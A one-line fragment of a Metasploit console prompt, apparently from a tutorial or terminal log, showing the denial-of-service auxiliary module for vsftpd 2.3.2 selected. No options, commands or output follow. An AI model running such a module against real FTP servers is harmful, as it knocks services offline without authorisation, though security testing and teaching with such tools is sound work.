msf auxiliary(dos/ftp/vsftpd_232) >
```